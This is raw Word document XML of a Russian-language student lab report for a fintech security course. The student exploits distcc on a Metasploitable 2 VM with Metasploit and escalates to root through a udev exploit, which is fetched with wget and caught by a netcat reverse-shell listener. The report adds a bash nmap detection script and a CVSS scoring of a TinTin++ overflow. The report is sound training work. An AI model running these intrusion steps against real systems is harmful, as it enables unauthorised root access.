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b w:val="1"/>
          <w:color w:val="6d64e8"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="6d64e8"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#tinkoff fintech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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mework #1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68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6jynaot9cbnq" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability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6d64e8"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eqpoxxy8gmzz" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mon </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w: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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, 20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rrar1dgps27e" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Что такое “Vulnerability”?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i w:val="1"/>
          <w:color w:val="666666"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability is a bug, flaw, weakness, or exposure of an application, system, device, or service that could lead to a failure of confidentiality, integrity, or availability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ogp52fyi6djo" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задачи: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Rule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Найти уязвимости</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> развернуть на виртуалке уязвимую машину. Установить сканнер. ПО результатам протеститровать узвимости с целью получения рут доступа к машине.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ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Описать уязвимость:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> найти свежую уязвимость. Описать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CVSS v.3 Base Vector и Temporal Vector</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сайт nvd.nist.gov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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1pw1ma28yzdz" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ЗАДАНИЕ ПЕРВОЕ.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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_buwz1tcz7y35" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Развернуть машины на виртуалке.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Я использовал virtualbox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. По результатам выполнения домашней работы у меня поднято три виртуальные машины. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Metasploitable 2 - уязвима машина.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">OpenVAS (The GSM Community Edition) - машина с настроенным мною сканнером.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Kali Linux - машина для пентестинга (с установленным metasploit framework)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Связь между машина через host only adapter. Кали машина имеет доступ в интернет (через NAT);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76650" cy="17018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4456" l="0" r="178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pStyle w:val="Heading2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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p2nityf5kx5q" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сканирование с помощью openvas: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Произвел сканирование с помощью опенвас. Результаты экспортировал в пдф файл. Произвел анализ уязвимостей. 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2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8636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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mc3204lydx9s" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование эксплойта.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По результатам отчета выбрал несколько эксплойтов. Остановил выбор на  CVE-2004-2687 { Exploit the distcc daemon }. Почему именно эта уязвимость? Наверное в первую очередь потому, что на данный момент я имею ещё совсем немного опыта в данной сфере. Я протестировал несколько других эксплоитов (по гайду для метасплойтбл 2) и distcc уязвимость мне показалась самой интересной. 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Для начала я поднял ssh соединения с Kali. Затем настроив msf framework запускаем:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msfconsole -q -&gt; use exploits/…./disttc… (можно найти точное название с помощью команды search) -&gt; set rhost {сюда адрес жертвы}, и, собственно -&gt; exploit.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Используя эксплойт мы получаем ограниченный доступ к системе. (уровень daemon).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90938" cy="3417159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3417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Поэтому дальше пытаемся расширить наши права до уровня root. Для этого нам нужно больше информации такой как: какие процессы запущенны, какой софт установлен. Чтобы найти уязвимые сервисы. Я использовал команду: ps aux и анализировал запущенные процессы.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92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Udev - возможно - имеет уязвимости. Чтобы быть уверенным, надо узнать его версию. Для этого команда: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l | grep udev.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Версия 17-08. Ищем эксплойт searchsploit udev (по базе данных exploitdb). Находим нужный эксплойт. Далее нужно перекинуть скачанный эксплойт на машину жертвы. Я использую свой веб сервер apache2. НА машине жертвы wget &lt;ip web server&gt; /&lt;exploitname&gt; . </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">А еще создаем башевский файл а-ля пэйлоад с содержимым: </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5600700" cy="1514475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Находим нужный пид</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /proc/net/netlink</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (как вариант можно через ps -aux | grep udev; PID - 1)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67338" cy="1378347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13783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Компилим экслоит (написан на C) gcc &lt;exploit.c&gt; и запускаем его с пидом (в качестве аргумента)  2296 в то время как со стороны Кали: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 5678</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (будем слушать ответ с компа жертвы) нетстат слушает нужный порт. В результате получаем права рута.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3462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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i0m3isloguok" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. БОНУС часть. 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b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Бонус: написать свой скрипт для детектирования проэксплуатированной уязвимости.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Я написал скрипт на баше, определяющий - установлен ли данный сервис (конкретно distccd) и, если есть, то проверяет версию установленного distccd, если  v1, то машина vulnerable.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не судите слишком строго, написал как мог :)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В качестве аргументов принимает: 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argv1 = ip address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argv2= port number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Если порт не был указан - то сканирует все доступные порты. При нахождении уязвимости выводит: Host is vulnerable.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57926" cy="4211638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7926" cy="4211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Сам скрипт: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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip=$1;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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port=$2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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if [ -z $2 ]; then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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">echo 'no port selected... perfom a full scan'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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">port="1-65000"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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fi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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p $port -T4 -sV $ip -v0 -oN scan.txt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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wait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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP_EXIT_STATUS=$?</w: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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo ''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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'scan completed... now checking results with grep'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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo ''</w:t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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat scan.txt | grep "distccd v1"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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAT_EXIT_STATUS=$?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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9da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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if [[ NMAP_EXIT_STATUS -eq 0 &amp;&amp; CAT_EXIT_STATUS -eq 0 ]]; then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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">printf '\n\e[38;2;255;0;0mIT IS VULNERABLE\n'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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">printf '\n\n\e[38;2;255;0;0m Host is not vulnerable.\n'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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t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firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="c9daf8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -rf scan.txtt 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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bswnwvuwqxj9" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ЗАДАНИЕ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Найти свежую CVE уязвимость для которой на </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="3a6d99"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">nvd.nist.gov</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> отсутствует CVSS вектор (в состоянии "UNDERGOING ANALYSIS") и описать CVSS v.3 Base Vector и Temporal Vector для нее. Обосновать свой выбор. Желательно сдать до того как вектор будет опубликован на сайте NVD.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15240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Калькулятор с вектором:</w:t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1"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18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https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N/E:P/RL:O/RC:C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29464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Сама уязвимость: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1"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20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https://nvd.nist.gov/vuln/detail/CVE-2019-7629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color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack-based buffer overflow in the strip_vt102_codes function in TinTin++ 2.01.6 and WinTin++ 2.01.6 allows remote attackers to execute arbitrary code by sending a long message to the client.</w:t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color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака на переполнения буфера. Приложение ТинТин++ (MUD game).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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score Metrics.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Attack Vector: Network(AV:N) - атака осуществляется удаленно.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Attack Complexity: Low (AC:L) - сложность атаки низкая, не требуется каких-то дополнительных условий для реализации эксплойта.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Мы настариваем сервер на порт 4000 и посылаем 60 тысяч символов на вин-тин после соединения. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Privilege required PR: NONE. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Атаку может выполнить пользователь с любым доступом.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">User Interaction: None </w:t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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope changed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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5"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidentiality Impact (C)*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
